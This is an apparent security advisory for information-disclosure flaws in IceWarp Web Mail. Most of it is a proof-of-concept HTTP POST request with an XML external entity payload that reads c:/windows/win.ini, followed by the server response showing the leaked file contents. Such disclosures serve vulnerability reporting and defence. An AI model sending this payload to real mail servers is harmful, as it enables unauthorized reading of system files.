source: https://www.securityfocus.com/bid/49753/info
IceWarp Web Mail is prone to multiple information-disclosure vulnerabilities.
Attackers can exploit these issues to gain access to potentially sensitive information,and possibly cause denial-of-service conditions; other attacks may also be possible.
Proof-of-Concept:
The following POST request was sent to the host A.B.C.D where the IceWarp mail
server was running:
REQUEST
=========
POST /-.._._.--.._1243848280/server/webmail.php HTTP/1.1
Host:A.B.C.D
User-Agent: Mozilla/5.0(Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101
Firefox/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language:en-gb,en;q=0.5i've
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D
Content-Length:249
Content-Type: application/xml;
charset=UTF-8
Pragma: no-cache
Cache-Control: no-cache
<!DOCTYPE foo [<!ENTITY xxeb91c4 SYSTEM "file:///c:/windows/win.ini">]><iq
type="set"><query xmlns="webmail:iq:auth"><username>test&xxeb91c4;</username><digest>828cd27c6fb73ee32674602e9c5521f005c614f5fb9266fd071dab323b5079e02d47a421c01df2efffcd2bdb221e15bf2baa4acefe38f264d92d152878ca4d33</digest><method>RSA</method></query></iq>
RESPONSE:==========
HTTP/1.1200 OK
Server: IceWarp/9.4.2
Date: Wed,20 Jul
201110:04:56 GMT
Expires: Thu,19 Nov 198108:52:00 GMT
Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/xml
Vary: Accept-Encoding
Content-Length:1113<?xml version="1.0" encoding="utf-8"?><iq type="error"><error
uid="login_invalid">test;for16-bit app support
[fonts][extensions][mci extensions][files][Mail]
MAPI=1....TRUNCATED
